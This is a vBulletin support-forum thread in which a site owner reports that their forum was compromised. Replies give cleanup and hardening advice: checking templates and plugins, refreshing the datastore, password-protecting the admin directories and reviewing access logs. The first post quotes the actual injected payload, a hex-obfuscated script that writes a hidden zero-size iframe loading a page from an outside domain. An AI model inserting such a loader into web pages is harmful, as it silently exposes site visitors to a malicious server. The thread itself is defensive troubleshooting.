Announcement

Collapse
No announcement yet.

Need urgent help - Malicious code inserted in my forum

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Need urgent help - Malicious code inserted in my forum

    Hi guys, i have a forum running Vbulletin 3.6.5 wich has been infected this week. The next code appears in the source code of the web site:

    Code:
    <script language='JavaScript'>document.write(unescape('\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x32\x30\x2E\x65\x64\x6F\x69\x73\x2E\x69\x6E\x2F\x78\x2F\x69\x6E\x64\x65\x78\x2E\x70\x68\x70\x3F\x73\x3D\x62\x64\x38\x33\x61\x30\x36\x62\x61\x66\x64\x64\x35\x30\x65\x65\x34\x37\x65\x33\x65\x64\x37\x38\x38\x30\x62\x32\x33\x34\x37\x62\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x20'))</script>
    Wich is a hidden iframe that leading to http://20.edois.in server.

    The code is appearing in the header menu options.
    Could you let me know which php is the one for the header ?

    thanks

  • #2
    It's not injected into your PHP files; the code is either injected into your STYLE - ie. Headinclude / Header / Footer; or it is injected via a plugin, you will have to look through plugin code in the plugin manager inside indiviaul plugins - typically something that's triggered on GLOBAL hook.

    It could also have been injected into the datastore; to fix this, click edit on any plugin in the plugin manager - but do not make any changes - click save, this will refresh the data store.
    anders | vbulletin team | check out the new vbulletin facebook app
    Proudly vBulletin'ing since 2001
    Please be my friend!
    http://www.twitter.com/inetskunkworks
    vBulletin Performance Articles:
    Click here to read

    Comment


    • #3
      Many thanks. Any idea how could this have happened?

      Comment


      • #4
        Originally posted by enfoque21 View Post
        Many thanks. Any idea how could this have happened?
        Without having intimate knowledge of your products, versioning, server configuration it is impossible to say how this could have happened. I would however suggest you put a basic HTACCESS authorization on your /admincp directory.
        anders | vbulletin team | check out the new vbulletin facebook app
        Proudly vBulletin'ing since 2001
        Please be my friend!
        http://www.twitter.com/inetskunkworks
        vBulletin Performance Articles:
        Click here to read

        Comment


        • #5
          First use this tool to get rid of the injection:
          http://www.vbulletin.org/forum/showthread.php?t=220967

          Second:
          You need to create a .htacces file and a .htpasswd in the "ADMINCP" directory on your server! This will create another password for anyone to access the entire directory. Do the same for your "INCLUDES" directory and "INSTALL" directory. I had the same problem you did and this completely closes all back doors and prevents anyone accessing your directories!

          Make sure you use a different username and password than the ones you use to access the admin control panel via the forums. Also encrypt the password with the link below.

          Instruction are here:
          http://www.phpfusion-mods.net/articl...?article_id=23

          Password generator here:
          http://www.htaccesstools.com/htpasswd-generator/

          It will take some time for you to create these files and make them work properly by using the full path - AuthUserFile /full/path/to/.htpasswd

          Once you get it all working correctly a window pops up asking you to enter the username and password when accessing these directories. No one will be able to do any changes accept for you and who ever has the htaccess username and password.

          Good luck!
          Skydiving Forums - http://www.skydive-info.com/skydiving
          "If you don't know where you are going, you'll end up some place else." - Yogi Berra
          Home - http://www.Skydive-Info.com

          Comment


          • #6
            Originally posted by Jump View Post
            First use this tool to get rid of the injection:
            http://www.vbulletin.org/forum/showthread.php?t=220967

            Second:
            You need to create a .htacces file and a .htpasswd in the "ADMINCP" directory on your server! This will create another password for anyone to access the entire directory. Do the same for your "INCLUDES" directory and "INSTALL" directory. I had the same problem you did and this completely closes all back doors and prevents anyone accessing your directories!

            Make sure you use a different username and password than the ones you use to access the admin control panel via the forums. Also encrypt the password with the link below.

            Instruction are here:
            http://www.phpfusion-mods.net/articl...?article_id=23

            Password generator here:
            http://www.htaccesstools.com/htpasswd-generator/

            It will take some time for you to create these files and make them work properly by using the full path - AuthUserFile /full/path/to/.htpasswd

            Once you get it all working correctly a window pops up asking you to enter the username and password when accessing these directories. No one will be able to do any changes accept for you and who ever has the htaccess username and password.

            Good luck!

            How does this fix the security hole?

            Its still there & its still use able, fix your security holes, dont mask them.
            Gentoo Geek

            Comment


            • #7
              Originally posted by enfoque21 View Post
              Many thanks. Any idea how could this have happened?
              Ask your host to check their access logs round the time of the hack. That will give them an exact overview of how they got in.

              Comment

              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...
              X